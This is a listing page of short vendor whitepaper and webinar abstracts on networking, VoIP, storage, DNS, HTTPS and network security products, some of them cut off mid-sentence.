Published By: Gigamon
Published Date: Oct 15, 2015
NetFlow was introduced on Cisco routers as a way to monitor packets as they enter and exit networking device interfaces in
order to gain insight and resolve congestion. Typical information contained in a NetFlow record reveals traffic source and destination as well as protocol or application, time stamps, and number of packets. Although NetFlow was initially not on a standards track, it has now been superseded by the Internet Protocol Flow Information eXport (IPFIX), which is based on the NetFlow Version 9 implementation, and is on the IETF standards track with RFC 5101, RFC 5102.
Everyone is concerned with digital data security today, in one way or another. For every digital advancement, there seems to be a counter development to breach its security. The trust and etiquette that once governed the use of the old telephone party lines would serve us well today, but we cannot count on such protocol for today’s data and communication devices. Additional protection is needed.
The Digital Security and Surveillance eZine is about channel partners extending their expertise in Internet Protocol to a whole new arena. For these partners, security goes well beyond software, firewalls, VPNs and other security offerings commonly discussed in the industry. These partners are combining networks, storage, cameras and similar technologies into full solutions designed to help protect the customer.
Are common myths about switching your business phone service to hosted Voice over Internet Protocol (VoIP) holding back your business? As voice, video, and data networks meld into a single user experience, solutions that integrate phone service, unified messaging, voicemail, audio and video capabilities, rich-media conferencing, and mobility solutions are in high demand.
Firewalls enforce network access via a positive control model, where only specific traffic defined in policies is granted access to the network while all other traffic is denied. Access Control Lists (ACLs) initially performed this functionality, often in routers, but their rudimentary approach gave way to dedicated packet filtering and stateful inspection firewall devices that offered deeper levels of access controls. Unfortunately, these traditional firewalls shared a common shortcoming—an inability to see all of the applications traversing the network across all ports and protocols. The use of proxy-based devices began providing more granular visibility into a small set of applications and protocols where traditional firewalls were blind.
Published By: Tripp Lite
Published Date: May 15, 2018
A Practical Guide to IDF/MDF Infrastructure Implementation
Once relegated to early adopters and casual home users, VoIP (voice over Internet protocol) has matured. An essential element of any unified communications (UC) system, it is now the standard method of voice communication in business, education, government and healthcare. If your organization has not already migrated to VoIP, the question is not so much if it will, but when. Cost is the primary driver, since the data network performs double duty by carrying voice traffic as well. VoIP also offers capabilities that far exceed traditional phone systems, with unified communication platforms promising to integrate messaging, mobility, collaboration, relationship management, zoned security, intelligent call routing, disaster recovery, video, teleconferencing, status updates and other advanced features.
The transition to VoIP presents a number of challenges, including
assessing the ability of your network to handle not only additio
Frost & Sullivan review the limitations associated with a single-provider approach to MPLS networks and its impact on the enterprise. They examine Virtela's Global Service Fabric - a multi-carrier network approach that provides a best-of-breed global MPLS network solution.
Today’s data centers are expected to deploy, manage, and report on different tiers of business applications, databases, virtual workloads, home
directories, and file sharing simultaneously. They also need to co-locate multiple systems while sharing power and energy. This is true for large as
well as small environments. The trend in modern IT is to consolidate as much as possible to minimize cost and maximize efficiency of data
centers and branch offices. HPE 3PAR StoreServ is highly efficient, flash-optimized storage engineered for the true convergence of block, file,
and object access to help consolidate diverse workloads efficiently. HPE 3PAR OS and converged controllers incorporate multiprotocol support
into the heart of the system architecture
Published By: Preempt
Published Date: Nov 02, 2018
Attackers and malware are increasingly relying on a common set of tools to compromise identities and spread within a network. Tools like Mimikatz accompanied with common administrator tools like PsExec and WMI have become a standard part of an attacker’s arsenal to turn a single machine compromise into a full network breach. In this webinar we will take a look at why some of these tools are traditionally difficult to control, and introduce new countermeasures that let you fight back. In this webinar we will cover:
- An analysis of recent malware and attacks and the tools they used to spread through the network.
- A closer look at the underlying protocols supporting these tools, and the traditional challenges to controlling them.
- Introduce new controls that allow organizations to control NTLM in real-time, block pass-the-hash techniques, and adaptively control the use of NTLM in the network.
- How to gain visibility into PsExec, WMI, and RPC in general and how to create controls t
DNS is a well-worn data exfiltration and communication vector. Explore why targeted threats continue to use the DNS protocol to exfiltrate sensitive information, how it’s done, and what might be next in the evolution of this attack vector.
Published By: Teradata
Published Date: Jun 22, 2015
Passed on May 9, 2014, the Digital Accountability and Transparency Act (DATA Act) legislation requires federal agencies to report all expenditures—grants, loans, and contracts—in order to provide American citizens and policy makers better visibility into federal spending. At first glance, new federal requirements— which are scheduled to go in effect May 2017—can seem like imposed obligations with unknown benefits to the implementers. However, wise agencies and early adopters recognize how to transform this new compliance obligation into an opportunity to advance their federal agency by becoming more data driven. The Federal Government maintains vast amounts of data, and the DATA Act establishes data standards and sharing protocols that will help agencies exploit the benefits of data mining and analytics.
Published By: DigiCert
Published Date: Aug 01, 2018
As a leading provider of SSL certificates, DigiCert is here to help you discover the benefits of using HTTPS across your entire site, and to help you successfully implement it.
HTTPS Everywhere is a best practice security measure for websites that ensures the entire user experience is safe from online threats. The term simply refers to using HTTPS—the secure web protocol enabled by SSL/TLS—across your entire website instead of selectively.
Implementing HTTPS Everywhere on your website secures the user and your organization’s data on every page— from start to finish.
Published By: Riverbed
Published Date: Jul 17, 2013
Riverbed Cascade is a new type of tool that incorporates traffic monitoring, packet capture and protocol analysis to provide an application-aware view of the network. Download this white paper from NetMedia to learn how Riverbed Cascade can help to solve your IT performance challenges.
Given the wide range of technology options available, it's important for healthcare IT executives to pick the right image management technology and approach for a long-term sustainable solution delivering the desired performance and ROI. This whitepaper explores solutions for multi-layered neutrality, a standards-based framework for unifying medical images and clinical documents across the enterprise and community.
This whitepaper discusses why speed, or throughput, is so critical for today’s Internet users, provides a historical perspective on the Internet’s TCP protocol underpinning and describes how the FastTCP protocol addresses the needs of today’s Internet.
This competitive review between Red Hat and TIBCO integration technologies has presented multiple differences between the products.
A notable difference is that only Red Hat JBoss Fuse is a 100% open source product. Red Hat is committed to leveraging existing open source projects and using open standards whenever possible for both product implementation and integration communication. This includes Camel, the de-facto integration standard included with Red Hat JBoss Fuse. Red Hat’s open source commitment extends to Active MQ, the upstream messaging technology used with JBoss A-MQ and included with Red Hat JBoss Fuse.
Another difference is that Red Hat JBoss Fuse clustering is based on the upstream Fabric8 community project and offers much more functionality than TIBCO clustering options.
The explosive growth of eCommerce has focused attention on security concerns associated with online payment transactions. Cardholders worry about the safety of online transactions while card issuers are concerned about balancing the risks and costs of payment fraud with a loss of revenue caused by transaction abandonment. The 3-D Secure protocol allows payment card issuers to reduce fraud in payment transactions by verifying cardholder identity during Card Not Present (CNP) transactions. Before a transaction is authorized, a cardholder can be challenged to enter a password, answer a question, or use some other form of authentication credential. This interruption in the transaction often causes legitimate customers to abandon the purchase resulting in loss of revenue for the issuer. The challenge is how to reduce fraud without impacting the user purchase experience.
The tremendous growth of unstructured data is creating huge opportunities for organizations. But it is also creating significant challenges for the storage infrastructure. Many application environments that have the potential to maximize unstructured data have been restricted by the limitations of legacy storage systems. For the past several years—at least—users have expressed a need for storage solutions that can deliver extreme performance along with simple manageability, density, high availability and cost efficiency.
Published By: Workday
Published Date: Jul 19, 2017
The shift to SaaS is gaining momentum and there are clear business benefits that can be derived. To optimise success, transformation strategies need to encompass all elements of people, processes, technology and organisational design. Adopting SaaS technologies drives significant change to the way organisations operate – from business processes to support model design and company culture. The implications of cloud adoption and technical challenges such as integrations, data migration and configuration must be fully understood and addressed from the outset.
The DNS is an often-overlooked protocol. Historically, many companies believed they could either run their own DNS service in-house or simply use a bundled option provided by their hosting or CDN provider. However, with the rise in DDoS attacks and continued migration to the cloud, the mission-critical nature of the DNS has become quite apparent to companies around the world. As a result, many are searching for a managed DNS provider.
DNS speed and reliability are fundamental to the performance of your website and essential to your business. Contact Dyn today to learn how a supplemental DNS service can help you optimize DNS performance and improve user experiences. We can help you determine which multi- DNS option is best for your business and assist with planning and service integration efforts.